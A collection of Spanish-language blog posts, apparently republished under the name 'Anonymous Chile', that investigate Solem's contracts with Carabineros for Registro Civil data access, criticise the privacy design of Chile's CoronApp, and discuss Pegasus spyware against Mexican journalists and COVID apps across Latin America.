En su sitio web, se señala que poseen filiales precisamente en Panamá y Colombia. Hoy en día, según registros de Mercado Público, la compañía generalmente vende servicios de monitoreo de redes sociales, como el que se cerró el pasado 9 de abril con la Subsecretaría de Prevención del Delito, por un total de $4,9 millones. En cuanto a sus clientes, destacan a la Armada de Chile, el Banco Itaú, la Clínica Indisa, el Banco de Panamá, Hites, el Banco de Crédito e Inversiones (BCI), Ripley, Santander, Telefónica, BancoEstado, Transantiago, Scotiabank, Banco de Bogotá y la Red de Salud UC, entre otros.

La historia de Solem con Carabineros de Chile comenzó el segundo semestre de 2010, cuando la institución quería acceder a las plataformas de apoyo de la Reforma Procesal Penal, administrada por el Registro Civil. Solem conocía de cerca esta herramienta, pues la habían desarrollado –según ellos describen en sus presentaciones de negocios (ver documento)– a través de Sonda, esta última ligada al empresario Andrés Navarro, amigo íntimo del presidente Sebastián Piñera.

Acorde a la necesidad, el 20 de diciembre de 2010 se firmó un contrato de arriendo de una Gateway (máquina computacional) para interconectar “1.000 puntos de verificación de identidad a la Plataforma Procesal Penal (RPP) del Servicio de Registro Civil e Identificación”. Así, la policía uniformada accedió a estos datos elementales para su labor diaria a través de este computador arrendado a Solem, por el que pagó $81 millones de arriendo a lo largo de 36 meses.

Como el monto excedía lo permitido para incurrir en un trato directo, desde Carabineros salió una resolución exenta en agosto de 2010, donde se eximía de una propuesta pública debido a que Solem era “propietaria del diseño, desarrollo e implementación de la plataforma de apoyo a la reforma procesal penal para el Servicio de Registro Civil e Identificación, por lo que […] resulta aplicable en la especie la causal de trato directo”. Tanto el contrato como la resolución exenta fueron suscritas por el entonces director de logística, general Eduardo Muñoz Poblete, que aparece dentro de las investigaciones por irregularidades en Carabineros, siendo en esa época Eduardo Gordon Valcárcel el general director.

De tal modo, Solem quedó con el servicio por tres años, el cual renovó sin competencia por otro año más el 4 de julio de 2014, en un trato firmado por el general Jorge Ricardo Vidal Varas por un monto de $22 millones.

Tras esos cuatro años, ante un nuevo trato, Solem aseguró en 2015, por medio de una carta de único proveedor, que era la única compañía capaz de prestar el servicio. Para entonces, Solem había obtenido $100 millones en contratos con Carabineros.

Pero lo más jugoso comenzó a producirse a partir de 2015, a medida que crecían las exigencias de modernización del Estado chileno.

Ignorando las funciones de Simccar

En agosto de 2015 ya se planeaba una ampliación de este servicio, y para ser nuevamente elegidos, Solem elaboró la declaración de único proveedor antes referida, fechada el 18 de ese mes, en la cual señala que “las componentes del Gateway como de las estaciones de trabajo fueron desarrolladas por personal especialista de Ingeniería Solem S.A., el conocimiento lo posee solo algunos de los profesionales especialistas”.

“Toda modificación a cualquiera de las componentes debe ser realizada por estos profesionales, no admitiendo sustitutos para la prestación de este servicio en los tiempos adecuados para garantizar la continuidad operativa del servicio”, continuaba el documento (ver documento).

La declaración de proveedor único de la empresa fue refrendada por un informe técnico de Carabineros fechado el 28 de agosto de 2015, firmado por el teniente Carlos Correa Catalán, jefe del área de producción TIC (Tecnologías de la información y la comunicación).

En este texto, el oficial expuso que no solo era necesario aumentar los puntos de conexión, sino que también resultaba crucial una renovación tecnológica para adaptarse a la nueva plataforma del Registro Civil, por los cambios en este último organismo a partir de la entrada del proveedor Morpho (actual Idemia), quien llegó el segundo semestre de 2013 reemplazando a Sonda.

Por lo mismo, el teniente Correa Catalán –en conjunto con el ingeniero en ejecución Jaime Contreras San Martín– indicaron que se debía ampliar el trato. Y entre las necesidades, destacaron la “de contar con un canal de comunicación para los 2.664 Sistemas Móviles de Consulta de Carabineros (Simccar) que deben realizar consultas al SRCEI [Registro Civil]” (ver documento).

Un doctor en ingeniería de sistemas, que revisó las propuestas técnicas a las que se ha obtenido acceso, indicó que en realidad el trabajo que realizaba Solem lo podía “hacer cualquier ingeniero de sistemas con tres años de experiencia en el tema. En una escala de profesionales junior, medium, senior, es más que suficiente con un ingeniero junior trabajando media jornada en el Gateway para mantener el sistema funcionando”.

A estas alturas, con el informe del teniente Correa Catalán ingresado en un proceso de compra pública, ya habían pasado varios meses desde el resultado de la licitación destinada a proveer de equipos Simccar a Carabineros. Estos dispositivos son los que ayudan a los policías en ejercicios rutinarios como los controles de identidad. De tal modo, el 2 de octubre de 2014, la institución adjudicó a Integradores de Tecnología y Sistemas S.A. (Intesis) el arriendo de 2.664 sistemas móviles para hacer estos tipos de consulta en el territorio.

Lo que no vio –o no quiso ver– Carabineros ni Solem antes de cerrar su trato en 2015, fue que en la licitación de Simccar, llevada a cabo en 2014, la misma policía uniformada, en sus anexos técnicos, solicitó que los concursantes ofrecieran equipos que pudieran “generar una consulta a la Base de Datos del Registro Civil y así obtener la identidad de una persona, tanto por R.U.N. y/o Biométrica [huellas digitales], mostrando los datos personales del individuo”.

No por nada, Intesis –que en mayo de 2017 fue adquirida por Grupo GTD, que sigue proveyendo este servicio a Carabineros hasta marzo de 2021– adjuntó en la descripción de su oferta que los dispositivos contaban con una aplicación “la cual puede generar una consulta a la Base de Datos del Registro Civil”. Es decir, no se necesitaba ningún intermediario como Solem.

Tal cual ocurrió con la Policía de Investigaciones (PDI) con la herramienta Skypol, usada por la PDI hasta 2018. Esta última, según un folleto de Pegasus -compañía que la desarrolló– también consultaba directamente a la base de datos del Registro Civil.

A pesar de todos estos antecedentes, el nuevo contrato entre Solem y Carabineros se firmó el 7 de enero de 2016. En ese documento, la empresa se comprometió a interconectar otros 3.317 puntos de conexión (el 80% eran puntos para Simccar que de facto podían interconectarse con el Registro Civil) y actualizar los antiguos 1.000 de 2010. La duración del contrató se estableció en 36 meses, y la orden de compra salió dos semanas después por $468 millones.

Acorde a datos recabados previamente, el Grupo GTD, en vez de conectar los equipos Simccar directamente al Registro Civil, recurre a la interfaz proporcionada por Solem. Se intentó verificar este dato con GTD, pero descartaron referirse al tema, asegurando que “la información que solicitas es de Carabineros, por lo tanto no estamos autorizados a entregar detalles”.

Luego del contrato de 2016 vino una pequeña orden de compra en enero de 2019 por $10 millones donde se incrementó en 995 los puntos de interconexión y, según los documentos, las horas de “transferencia tecnológica”; sin embargo, el trato más abultado en la historia comercial entre Carabineros y Solem quedó cerrado el 10 de junio de 2019. Todo esto con Mario Rozas Córdova ya instalado como general director de la institución.

Allí se renovó el contrato de 2016 por otros 36 meses, se incluyeron mantenciones constantes a los primeros 1.000 puntos de interconexión de 2010 –concepto que implica un cobro mensual hasta hoy–, horas de transferencia tecnológica y el arriendo de otros 4.312 puntos de conexión desde la máquina. La orden de compra salió el 1 de julio del año pasado, por $629 millones.

Una de las causas de este aumento de demanda se puede encontrar en los arriendos de Simccar que Grupo GTD mantiene con Carabineros. Si en octubre de 2014 –cuando se adjudicó esta licitación– se pagaba mensualmente por 2.664 de estos equipos, en septiembre de 2017 pasaron a ser 3.186.

Por ende, el 73% de estos otros 4.312 puntos de conexión proveídos por Solem mantendrían la alternativa de prescindir de este intermediario privado y conectarse directamente al Registro Civil.

En la resolución exenta que autorizó esta renovación, fechada el 1 de marzo de 2019 y firmada por el general y actual director de logística Jean Camus Dávila, se menciona que además de Simccar, existe la necesidad de usar interconexiones para el Sistema de Automatización de Unidades Policiales (AUPOL), cuya calidad fue cuestionada por un informe de la Contraloría General de la República (CGR) de 2019 que publicó Radio Biobío.

Al consultarse con el Registro Civil sobre los distintos temas de este artículo, desde donde se confirmó que el acceso en línea hacia su plataforma de identificación “no tiene ningún costo”, pues se aplica el convenio suscrito con Carabineros del 3 de febrero de 2017. El único pago que se debe hacer es el que implica “adquirir las licencias correspondientes que permita dar curso a la implementación del convenio con el proveedor del sistema de identificación (Idemia)”.

Por último, desde el Registro Civil indicaron que no tienen ningún convenio firmado con Solem.

¿Riesgo de los datos?

El mismo doctor en sistemas también dijo que el servicio que presta Solem es considerado infraestructura crítica “en cualquier país desarrollado, y no se hace ‘outsourcing’ sino que se hace con personal ‘in house’». «Imagínate los datos personales de todos los ciudadanos circulando por los computadores de empresas como Solem», agregó.

Esta es la línea que habría seguido la PDI, que después de Skypol al parecer desarrolló un nuevo producto propio para este tipo de controles. Se intentó confirmar este dato con la policía civil, sin embargo indicaron que debíamos consultar vía Ley de Transparencia. En todo caso, desde la PDI aseguraron que la interconexión con el Registro Civil se realizó en 2016 mediante un trabajo de su Jefatura de Innovación y Tecnologías de la Información en conjunto con la compañía ETF Group.

En ningún caso, Solem era un proveedor único

Luego de comunicarse tanto con Carabineros de Chile como Ingeniería Solem S.A. para hacer las consultas respectivas de este artículo. Desde la institución policial indicaron que debíamos recurrir vía Ley de Transparencia, mientras que desde Solem no hubo respuesta alguna, pese a que en su línea telefónica informaron que debíamos escribir un correo electrónico a Patricio Leixelard Solá, director comercial. Ni él ni sus otros socios contestaron.

En suma, ninguno quiso referirse a la manera en que se estaban resguardando los datos tranzados en este Gateway. La situación es inquietante, debido a que en los términos de referencia del contrato que ha sido ampliado hasta 2022 no existen cláusulas de confidencialidad y la empresa está constantemente involucrada en el soporte de la máquina.

CoronApp: La vigilancia como solución a la pandemia

Publicada el 08/05/2020 - 02/08/2021 por Anonymous Chile

La gravedad de la crisis sanitaria ha motivado a las autoridades chilenas a mirar a la tecnología como una herramienta útil en el efectivo combate de la pandemia. Lamentablemente, la CoronaApp recientemente lanzada es sumamente problemática, riesgosa y, en última instancia, muy poco útil.

La gravedad de la crisis sanitaria que ha producido el COVID-19 ha motivado a las autoridades de Chile y el mundo a mirar a la tecnología como un recurso útil al combate más efectivo de la pandemia. La tecnología puede cumplir un rol apoyando una estrategia científicamente sólida, basada en principios epidemiológicos, orientados a la adopción de medidas útiles, que provean información científicamente correcta y logísticamente eficiente para la toma de decisiones individuales y colectivas. Pero no existen atajos tecnológicos.

En este escenario no basta con hacer “algo”. Se necesita entregar herramientas útiles, sin exponer a la población a riesgos adicionales producto de información confusa, la sobrecarga del sistema de salud a causa de la demanda creada por el autodiagnóstico, la generación de expectativas que no puedan ser satisfechas en la capacidad de testeo, o el desvío de capacidades de fiscalización por información errónea, falsa o maliciosamente aportada respecto de localización o desarrollo de eventos de riesgo.

La información recolectada, aún sobre la base de consentimiento de los titulares, debe ser solo la necesaria para ayudar al combate de la epidemia. La guerra es contra un “enemigo invisible y poderoso”, y no contra las ciudadanas y ciudadanos, víctimas del virus, ni sus derechos. Las exigencias de entrega de información sobre su condición de salud expone a quienes descarguen la aplicación a abusos derivados de la falta de control sobre el acceso y uso de tal información, y las condiciones de seguridad en su almacenamiento y tránsito.

Lamentablemente, la CoronApp lanzada por el gobierno de Chile no satisface ninguno de los criterios anteriores. Varias de las funcionalidades propuestas son problemáticas por diversas de razones, que examinamos aquí en detalle.

Utilidad limitada y recolección innecesaria de datos

Para su activación, la aplicación requiere los siguiente datos personales: RUN o número de pasaporte del usuario, correo electrónico, número telefónico, nombre y apellido, edad, comuna y ciudad de residencia, geolocalización, medicamentos que toma o han sido prescritos, preexistencia de enfermedades, datos de seguimiento de la enfermedad, tales como síntomas, contacto con personas contagiadas confirmadas y viaje a países de alto riesgo. Los usuarios además pueden agregar otros “usuarios dependientes” sin su consentimiento, ya sean familiares o personas que no tengan acceso a un dispositivo móvil propio. Es decir, los datos exigidos permiten un total perfilamiento del usuario, su condición de salud y su entorno de relaciones.

De acuerdo a la regulación vigente, estos datos califican como datos personales o datos personales sensibles, ya que dan cuenta del estado de salud o hábitos personales del usuario (información de localización espacial). La autoridad pretende salvar la cuestión del uso de los datos través de un consentimiento que los titulares de los dispositivos deben otorgar para poder utilizar la aplicación, y que que simplemente no existe en el caso de la información referida a terceros, que potencialmente pueden llegar a incluir hasta al vecino.

La finalidad del consentimiento sería el “seguimiento de síntomas y acompañamiento de pacientes sospechosos y confirmados con COVID-19” y para facilitar “el proceso de seguimiento del COVID-19 en nuestro país”. La finalidad declarada es muy importante por cuanto, bajo la legislación nacional vigente, los datos entregados bajo regla de consentimiento solo pueden ser utilizados “para los fines para los cuales hubieren sido recolectados”. Revisemos si las funcionalidades principales ofrecidas satisfacen la finalidad declarada, y si los datos personales solicitados son los adecuados para satisfacer tales finalidades.

a) Autoevaluación de síntomas

Esta funcionalidad entrega un formulario que permite enviar diariamente a la autoridad la autoevaluación de síntomas y así guiar decisiones de atención de salud de quienes descarguen la aplicación o de quienes han sido agregados como usuarias de la misma.

La información entregada por las usuarias de la aplicación —su condición de salud, patologías preexistentes y condiciones de riesgo específicas (contacto con personas infectadas o viajes a zonas de riesgo)— no necesita ser combinada con datos de identificación individual para hacer una contribución efectiva al diagnóstico. La aplicación podría recoger toda esa información y entregar recomendaciones en forma anónima o seudónima (si la persona crea un perfil con un avatar y alias), con exactamente la misma efectividad. La información de identificación individual requerida no cumple función alguna y solo expone a sus titulares a que terceros, dentro o fuera del Estado, accedan a estos datos con fines distintos a los estipulados por la aplicación, y con consecuencias múltiples, que incluyen ser objeto de distintas formas de discriminación, tanto en el presente como en en el futuro; algunas manifestaciones de este fenómeno ya se han hecho visibles: vecinos incómodos con la presencia de funcionarios de la salud o contagiados en sus edificios, condominios o barrios, a las que podrían sumarse o acciones de discriminación en oportunidades de empleo basadas en el desarrollo de anticuerpos o la determinación de primas de salud futuras por posibles secuelas, entre muchas otras.

Si el objetivo es entregar recomendaciones más precisas, por ejemplo, acerca de los centros asistenciales más cercanos, y mejorar así la logística del testeo, tampoco se requiere la información individualizada; bastaría con información agregada y anónima por áreas, sin necesidad de geolocalización específica.

Adicionalmente, resulta problemática la opacidad con la cual se definirá la clasificación de riesgo a partir de la cual se realizan las recomendaciones. ¿Cuáles son los criterios epidemiológicos y de capacidad de respuesta del sistema de salud que se tendrán en consideración para generar una autoselección adecuada y no generar una demanda no satisfecha en las áreas en que la aplicación cuente con más usuarios?

Finalmente, resulta altamente problemática la funcionalidad de vincular a personas dependientes a la aplicación, entregando sus datos personales sin su consentimiento. Esto es una infracción expresa a la normativa vigente en materia de protección de datos personales que la política de privacidad declara cumplir.

b) Recibir contenido informativo

Esta funcionalidad incluye notificaciones del Ministerio de Salud con información general de las medidas adoptadas en el contexto de la pandemia (tales como toque de queda y zonas de confinamiento obligatorio, entre otros) y enlaces a contenido informativo sobre la contingencia y la evolución de la pandemia.

Esta es sin duda la función menos problemática y puede constituir un canal ágil de entrega de información a la población. Sin embargo, queda por dilucidar cómo se determina la información relevante y cómo esta aplicación aporta al conocimiento acumulado y ya compartido a través de diversos otros medios por epidemiólogos, urgenciólogos, especialistas en pacientes críticos y expertos en enfermedades respiratorias, entre otros. La entrega eficiente de esta información tampoco requiere tener acceso a información individualizada de los usuarios de la aplicación, ni de su localización.

c) Proveer una instancia para informar y/o denunciar conductas o eventos de alto riesgo

La posibilidad de entregar alertas a través de la aplicación sobre situaciones de alto riesgo abre un abanico extenso de posibilidades para que el mecanismo sea utilizado erróneamente o derechamente abusado, ya que la información que se busca recopilar descansa sobre una declaración voluntaria de cada usuario y no está claro cómo será sometida a un juicio de calificación por parte de la autoridad que determine en qué casos pueda gatillar o no acciones de fiscalización. La funcionalidad así presentada es terreno fértil para actos de venganza y malos entendidos entre vecinos que, lejos de aportar al control de la pandemia, van a generar más instancias de fricción social en comunidades ya tensas por el encierro y el miedo. Adicionalmente, se trata de una función altamente falible, pues descansa en un componente humano y está asociada a los datos de localización provista por GPS, por lo que está sujeta a los defectos de esta tecnología, es decir baja precisión —pues puede variar de 5 a 500 metros (no menos de 2 metros como requiere el contagio del Covid-19)— e inestabilidad, que depende de la calidad de la conexión.

d) Indicar el lugar dónde se realizará la cuarentena

La descarga y uso de la aplicación es absolutamente opcional. Resulta curioso que se destinen recursos y esfuerzos a un desarrollo tecnológico que, al descansar en la voluntariedad, estará fiscalizando a aquellos ciudadanos más comprometidos con un combate efectivo de la pandemia. No tiene mucho sentido esperar que sean los ciudadanos rebeldes los que voluntariamente descarguen la aplicación y activen la funcionalidad de geolocalización que permitiría fiscalizar el incumplimiento de una medida de confinamiento. Además, el acceso a información de localización puede ser revocado en cualquier momento, con lo cual es absolutamente marginal la eficacia de la función propuesta para facilitar “el proceso de seguimiento del COVID-19 en nuestro país”.

Así, estamos frente a un mecanismo duplicativo de esfuerzos respecto de aquellos comprometidos con el cumplimiento de las medidas dictadas por la autoridad sanitaria, y que resulta completamente inútil frente a quienes han decidido incumplir, pero que expone a quienes descarguen la aplicación a todos los riesgos de privacidad y seguridad antes explicados. Se genera además un riesgo adicional de asignar equivocadamente los recursos de fiscalización, producto de la falta de precisión de las localizaciones a través de GPS antes explicadas. En otras palabras, el usuario estaría entregando sus datos sensibles de salud y ubicación a cambio de un mecanismo ineficaz para fiscalizar el cumplimiento de una obligación que ya se propuso voluntariamente acatar.

Una política de privacidad negligente

En su Política de Privacidad, la CoronApp informa que los datos recogidos serán almacenados fuera del país, por Amazon Web Services en Virginia, Estados Unidos, sin precisar bajo cuáles medidas de seguridad y confidencialidad serán almacenados; solo se mencionan las directrices generales de seguridad de la información del Ministerio de Salud, vinculados en forma genérica a los términos y condiciones de uso de la aplicación. La dispersión de documentos en que se abordan las diferentes temáticas de seguridad y privacidad hacen poco transparentes y poco precisas las condiciones de almacenamiento, acceso y uso de la información recolectada. Incluso se concibe el eventual acceso por parte de terceros a los datos, el que queda vagamente condicionado a una disposición que establece que “eventualmente el Ministerio de Salud podría ser requerido a entregar acceso o divulgar los datos a terceros, en virtud de una orden judicial o administrativa”.

Finalmente, la CoronApp no provee ninguna claridad acerca de la forma en la cual se procederá a la eliminación o destrucción de la información recogida, ni el plazo en que ello sucederá. Por el contrario, se hace una referencia genérica a que los datos “serán almacenados y tratados durante el tiempo que sea necesario para la protección de la salud pública, en el contexto de la emergencia sanitaria”, sin detallar ningún parámetro de cuándo y cómo se definirá este periodo, ni establecer mecanismos de control externo que permitan supervisar que ello efectivamente suceda. Como si esto no bastara, se permite la preservación de la información recogida hasta por 15 años “para fines históricos, estadísticos, científicos y de estudios o investigaciones”, “con las debidas medidas de seguridad y garantías de anonimización”, pero sin mandatar la agregación de tal información, como es propio de esfuerzos con propósitos similares que resguarden adecuadamente los derechos de los titulares de los datos. No se especifica cuáles serán las medidas de seguridad ni cómo se garantizará la irreversibilidad de la anonimización.

Ignorando la brecha digital y otras inequidades

Además de los problemas hasta aquí examinados, esta CoronApp ignora el elefante en la habitación: las condiciones de acceso a infraestructura y conectividad necesarias para su uso, lo que implica que la utilización de esta aplicación y los datos que ella recoja contendrán un sesgo representado por aquellos chilenos y chilenas que tienen acceso a un dispositivo móvil inteligente que soporte la descarga de la aplicación y que cuenten con acceso a una conexión a internet confiable y constante, que permita el funcionamiento correcto de la tecnología. De acuerdo a los más recientes estudios científicos en la materia, para que una aplicación tenga utilidad en la contención de la pandemia su nivel de adopción debe ser cercano al 60%.

La crisis ha constatado múltiples desigualdades estructurales significativas a la hora de evaluar el resguardo de los derechos fundamentales, tanto en Chile como en América Latina. Es de esperar que el afán por la implementación de soluciones tecnológicas no suponga acrecentar tales diferencias.

De esta forma en consecuencia así, cualquier sistema que implique la recolección y uso de datos personales no puede implementarse sin que se tomen medidas de resguardo y control para su uso, y seguridad en su almacenamiento, que permitan precaver el surgimiento de abusos que repercutan en el ejercicio de los derechos fundamentales, más allá de lo que se implemente resulte proporcional para combatir seria y efectivamente la pandemia. Del mismo modo, deben entregarse garantías de que cualquier medida extraordinaria de acceso a datos personales durante el transcurso del estado de excepción será revertida luego de controlada la pandemia.

La rápida acción para enfrentar la expansión del COVID-19 requiere de medidas excepcionales, pero no pueden llevarse a cabo violando los derechos fundamentales. Este es un mal momento para experimentar con los derechos fundamentales por cuyo reconocimiento hemos luchado, y que tanto vamos a necesitar cuando la emergencia pase, para construir una sociedad más justa, que nos permita superar las inequidades que hoy tienen en exacerbada condición de vulnerabilidad a gran parte de nuestras ciudadanas y ciudadanos.

Violencia y persecución al periodismo en México: la libertad y la privacidad en juego

Publicada el 07/05/2020 - 02/08/2021 por Anonymous Chile

La violencia contra periodistas en México se mantiene con índices tan altos como para mantener al país entre los más peligrosos -a nivel mundial- para ejercer esta profesión. A pesar de esto, no existen medidas ni políticas públicas que permitan frenar y penalizar efectivamente el uso de tecnologías para vigilar, amedrentar y atacar a quienes ejercen la libertad de expresión.

El 29 de octubre, la aplicación de mensajería WhatsApp, propiedad de Facebook, tomó acciones legales contra NSO Group, la empresa de tecnología de vigilancia que desarrolló el malware espía “Pegasus” aquirido por el Gobierno mexicano, cuyo uso ha sido estudiado y denunciado desde 2016 por ONGs nacionales como R3D, SocialTIC y Artículo 19, en el caso conocido como #GobienoEspía.

En mayo de este año, el equipo de seguridad de WhatsApp detectó una falla en la aplicación, que permitía inyectar spyware comercial en celulares mediante una simple llamada. Junto con desarrollar una solución al problema, se realizó una investigación que concluyó que la vulnerabilidad había sido explotada por NSO Group, que también utiliza el nombre Q Cyber Technologies.

La preocupante novedad que plantea esta forma de ataque es que, al ejecutarse mediante un llamado, no requiere que la víctima habilite la instalación del software malicioso pinchando algún hipervínculo, lo que dificulta la obtención de evidencia y la toma de medidas precautorias para evitar, documentar y denunciar intentos de infección.

Más de 1400 casos fueron identificados y al menos 100 contra defensores de derechos humanos. En México, un número importante de infecciones ocurrieron durante abril y mayo de 2019, coincidiendo con las revelación del caso de Griselda Triana, viuda del periodista Javier Valdez y víctima del espionaje a manos de agentes estatales, pues según NSO Group, solo venden sus productos a gobiernos.

Vigilancia como violencia

Actualmente, México es el país más peligroso del mundo para ejercer el periodismo, lo que naturalmente pone en riesgo la salud de la libertad de expresión y, con ello, de la democracia misma del país: incapaz para garantizar la seguridad de sus periodistas y, consecuentemente, incapaz de garantizar el bienestar y la autonomía de sus habitantes. La violencia contra las y los periodistas, que entre otras formas se expresa mediante el abuso de la tecnología de vigilancia por parte del gobierno mexicano, escala gracias al clima de impunidad que hace oídos sordos frente a las denuncias realizadas por comunicadoras, activistas y personas defensoras de derechos humanos, algunas de las cuales han perdido la vida o han tenido que migrar para preservarla.

Llama la atención de que, a pesar de los logros recientes de las ONGs que han presentado denuncias a NSO Group en cortes internacionales, la respuesta por parte del Gobierno no es más que una serie de promesas vacías que denotan un claro desconocimiento entre quienes lideran el país sobre los abuso de las tecnologías en México.

Por otro lado, lejos de perseguir los abusos tecnológicamente posibilitados, la milicia nacional parece premiar a sus responsables con ascensos laborales. La misma milicia que hoy participa de la implementación de la Guardia Nacional, una estrategia para militarizar las calles del país como respuesta a la presencia del narcotráfico y que en su más reciente muestra de poder evidenció ser completamente ineficiente.

En efecto, mientras el presidente declara que su administración no participa en el uso ilegítimo de las tecnologías y anuncia “compromisos”, hay personas con poder actuando desde diferentes instancias estatales para tomar ventaja de los puntos ciegos de una administración fuertemente criticada por su falta de un liderazgo estratégico, incapaz de conocer y controlar el alcance de las acciones que sus subordinados realizan con el poder que se les otorgado para “preservar la seguridad en el país”. Tal vez el problema acá sea que nadie les ha aclarado que no se trata de su seguridad propia, sino de la seguridad de la mayoría: quienes necesitan del periodismo libre para producir decisiones informadas y tener los elementos necesarios para cuestionar al Estado y sus representantes cuando no cumplan sus obligaciones fundamentales.

Lo que queda pendiente

Desde 2016 la participación de organizaciones no gubernamentales nacionales e internacionales para frenar el abuso de la tecnología se ha articulado en redes para presentar casos e informes conjuntos, con el fin de denunciar los abusos que diferentes gobiernos hacen de las tecnologías para vigilar a quienes expresan posturas críticas a sus administraciones. Los esfuerzos articulados de personas con experiencia legal, en comunicaciones, en activismo, en defensa de derechos humanos y con trayectorias multidisciplinarias en América Latina y México han sido potentes y constantes.

Hace falta que gobiernos, como el mexicano, asuman la participación en espacios de diálogo que permitan articular las experiencias y trayectorias de estos grupos a las propuestas administrativas y de desarrollo en las que quieran involucrar despliegues masivos de tecnologías, que se plasmen en acciones claras y concretas. Las declaraciones y compromisos realizados por el presidente se vuelven palabras vacías si no existen políticas públicas que las respalden. Es la única forma de defender la democracia participativa en el país, pero también asegurar que los derechos humanos sean preservados y contemplados dentro de las estrategias de seguridad nacional.

Tecnoptimismo en forma de CoronApps

Publicada el 07/05/2020 - 02/08/2021 por Anonymous Chile

Mientras la pandemia se agudiza, los gobiernos de la región apuestan cada vez más a soluciones basadas en tecnologías. Pero, ¿bastará el tecnoptimismo para cubrir los retos que enfrentamos?

En distintos países de la región se han tomado medidas para frenar los impactos de la propagación del virus SARS-CoV2 (COVID-19), comunmente conocido como coronavirus. En América Latina nos enfrentamos a un panorama incierto, donde los esfuerzos por intentar aplanar la curva pandémica han agudizado problemas que yacían invisibilizadas.

Frente a la incertidumbre han surgido propuestas que pretenden colocar a la tecnología como eje fundamental para guiar a los gobiernos en dirección a las medidas adecuadas o medir la eficiencia de las ya implementadas. Sin embargo, de nueva cuenta volvemos a caer en el espiral de la opacidad, donde se apuesta a implementaciones técnicas que, por falta de mecanismos de transparencia y rendición de cuentas, abren la posibilidad de menoscabar derechos humanos a través de la tecnología.

Y es que, como hemos hablado anteriormente, el uso de tecnología desapegado de una perspectiva de derechos humanos posibilita distintos tipos de abusos, sustentados por la falta de claridad respecto a las normativas, objetivos, facultades y restricciones que debieran enmarcar la implementación de herramientas técnicas.

¿Qué está pasando en América Latina?

En Argentina, se desarrolló la aplicación Covid-19 Ministerio de Salud que permite una autoevaluación de síntomas. Si bien esta aplicación no ofrece más información ni alertas en tiempo real, en el país se han difundido aplicaciones y plataformas de análisis no oficiales que pretenden predecir el comportamiento de la pandemia a través de inteligencia artificial.

En Bolivia el Ministerio de Educación presentó Coronavirus Bolivia, una aplicación que brinda información sobre prevenciones y cuidados, síntomas, preguntas frecuentes y números de emergencia, además de publicar datos y comunicados oficiales actualizados. Además, se dispuso el sitio Bolivia Segura donde -además de lo que ofrece la aplicación- se puede ingresar a Bolivia Verifica un esfuerzo que “se dedica a la verificación de noticias falsas y del discurso público para luchar contra la desinformación”.

En Brasil, se lanzó la aplicación Coronavírus-SUS que además de permitir autoevaluación, también ofrece información sobre prevención, unidades de salud disponibles y alertas emitidas por el Ministerio de Salud. Aunado a esto, en colaboración con el Hospital Israelita Albert Einstein, se ha puesto a disposición del público el sitio Meu Einstein para brindar autoevalución en línea.

En Colombia, CoronApp – Colombia fue la propuesta del Ministerio de Salud y el Instituto Nacional de Salud para monitorear el estado de salud de las personas en Colombia (residentes y extranjeras), también brinda información sobre las medidas gubernamentales, recomendaciones de prevención, ubicación de centros de salud y canales de atención. Además, se ha puesto a disposición el sitio web El Coronavirus en Colombia con información sobre el progreso del contagio en el país.

En Ecuador, la aplicación SaludEc busca ser un canal de telemedicina que complemente las estrategias del Ministerio de Salud Pública. Además de ofrecer autoevaluación de síntomas y proveer información oficial, esta aplicación permite agendar citas médicas de especialidades no relacionadas con el coronavirus. También se creó el sitio Coronavirus Ecuador donde además de lo que ofrece la aplicación existe una sección dedicada a reportar las noticias falsas que circulan a propósito de la emergencia médica.

En Guatemala, se presentó Alerta Guate, una aplicación desarrollada –de acuerdo a lo declarado por el presidente Alejandro Giammattei– “en colaboración con Israel y Google”. Esta aplicación está basada en la plataforma de comunicación de emergencia móvil In-telligent y ofrece alertas específicas de acuerdo a la ubicación de las personas (que también se reproducen de forma audible), instrucciones e información general y comunicación con personal de asistencia a través de un botón SOS.

En Honduras, Alerta Honduras fue creada como un esfuerzo independiente al gobierno ya que este no ha apostado por plataformas digitales para brindar servicios de información oficial centralizada. Ante esto, la necesidad de las personas por informarse llevó a que hubiera un auge de aplicaciones maliciosas, propiciando la popularización de un ransomware (secuestro de datos) en marzo.

En México, la aplicación COVID19-MX fue presentada a inicios de abril y ofrece accesos directos a los canales de atención, autodiagnóstico, ubicaciones de centros de salud cercanos, información, noticias y consejos de prevención. Este esfuerzo se suma al sitio web oficial Coronavirus, la implementación de un chatbot para autodiagnóstico y la recientemente anunciada colaboración entre empresas de telefonía y autoridades gubernamentales para monitorear el movimiento de quienes residen en la Ciudad de México.

En Uruguay, se presentó Coronavirus UY, una aplicación enfocada a permitir el autodiagnóstico y ofrecer soluciones de telemedicina a quienes sospechen haber contraído el virus. Esta aplicación, como estipuló el secretario de Presidencia, es un elemento adicional a las vías de comunicación ya implementadas por el gobierno, tales como el sitio web del Plan Nacional Coronavirus, un chatbot y canales de comunicación alterna a través de WhatsApp y Messenger.

¿Qué casos nos preocupan?

Si bien estas medidas parecen inocuas, particularmente en los casos de Brasil, Ecuador y México distintas organizaciones e instituciones de la región nos hemos posicionado para señalar una serie de inquietudes respecto a las propuestas gubernamentales de estos países respecto a implementaciones tecnológicas para rastrear la propagación del virus.

En distintas prefecturas de Brasil se han implementado tecnologías que pretenden utilizar servicios de geolocalización para identificar a quienes incumplieran con la cuarentena establecida. En Ecuador se implementa la georreferenciación de personas en el cerco sanitario a través de rastreo satelital. En la Ciudad de México se anunció la implementación de georreferenciación de telefonía móvil para “un monitoreo del movimiento y contacto entre personas, con el objetivo de identificar si cumplen con el aislamiento”.

Aunque el contexto de emergencia exija medidas extraordinarias, es preocupante que más allá de las declaraciones de uso de ciertas tecnologías no exista claridad respecto al uso, limitaciones y medidas de resguardo en el tratamiento de datos personales y sensibles que serán capturados masivamente a través de estas implementaciones. En esa vaguedad es donde se instaura la posibilidad de que estas medidas excepcionales no solamente se normalicen, sino también sean usadas de forma abusiva en detrimento de los derechos humanos para fortalecer mecanismos de vigilancia y control social.

Medidas excepcionales y abusos cotidianos

Como hemos señalado anteriormente, la tecnología provee de oportunidades valiosas para potenciar esfuerzos encaminados al desarrollo social. Pero si la tecnología se implementa sin controles claros esta potencia puede devenir en la instrumentalización de las capacidades de recopilación de datos, identificación o incluso diseminación de información con fines que distan del respeto a los derechos humanos y se acercan más a formas de control social.

